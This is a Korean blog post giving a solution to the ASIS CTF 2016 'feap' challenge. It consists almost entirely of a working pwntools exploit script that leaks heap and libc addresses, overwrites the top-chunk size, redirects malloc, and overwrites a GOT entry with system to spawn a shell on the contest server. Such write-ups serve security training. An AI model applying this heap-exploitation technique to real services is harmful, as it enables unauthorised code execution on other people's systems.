ASIS CTF 2016 feap

Games/CTF 2016. 5. 11. 02:44

힙쪽에 64바이트 오버플로우. topchunk 덮어서 malloc 조작한뒤 GOT 덮어서 쉘획득.


from pwn import *

context.arch = 'amd64' # i386 / arm


DELTA = 0x27be0

while True:

print hex(DELTA)

try:

# recvuntil sendline, pack, recv, send

r = remote('feap.asis-ctf.ir', 7331)

#r = process(['./feap'])

#raw_input('attach')

# start pwn.


# prepare first heap chunk

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')

r.sendline(pack(0x6020a8)) # heap address

print r.recvuntil('70): ')

r.sendline('nah')


print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

heap_base = int(leak[::-1].encode('hex'), 16)

heap_base = heap_base & 0xFFFFF000

print 'heap base : {0}'.format(hex(heap_base))


# prepare first heap chunk

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('1')      # heap address

print r.recvuntil('title: ')

r.sendline(pack(0x602048))

print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

fgets = int(leak[::-1].encode('hex'), 16)

print 'fgets : {0}'.format(hex(fgets))


# overwrite topchunk

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('2')

print r.recvuntil('body: ')

r.sendline('\x41'*72 + '\xFF'*8) # overwrite topchunk size to -1


# fuck malloc

TARGET = 0x602010

delta = TARGET - heap_base - 0x218

print str(delta)

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline(str(delta))

print r.recvuntil('63): ')

r.sendline('lol')


# overwrite free

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')


#system = fgets - 0x27be0 # local

system = fgets - DELTA

payload = 'AAAAAAAA' # libc_start

payload += pack(fgets) # fgets

payload += pack(system) # strtoll

r.sendline(payload)      # heap address

print r.recvuntil('70): ')

r.sendline('CCC')


# get shell

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('/bin/sh;')


# get shell

r.interactive()


except:

pass

DELTA += 0x10



'Games > CTF' 카테고리의 다른 글

BKP2016 segsh  (0) 2016.06.24
ASIS CTF 2016 books  (0) 2016.05.11
ASIS CTF 2016 feap  (0) 2016.05.11
PlaidCTF 2016 butterfly  (0) 2016.04.19
PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19
Posted by daehee87

댓글을 달아 주세요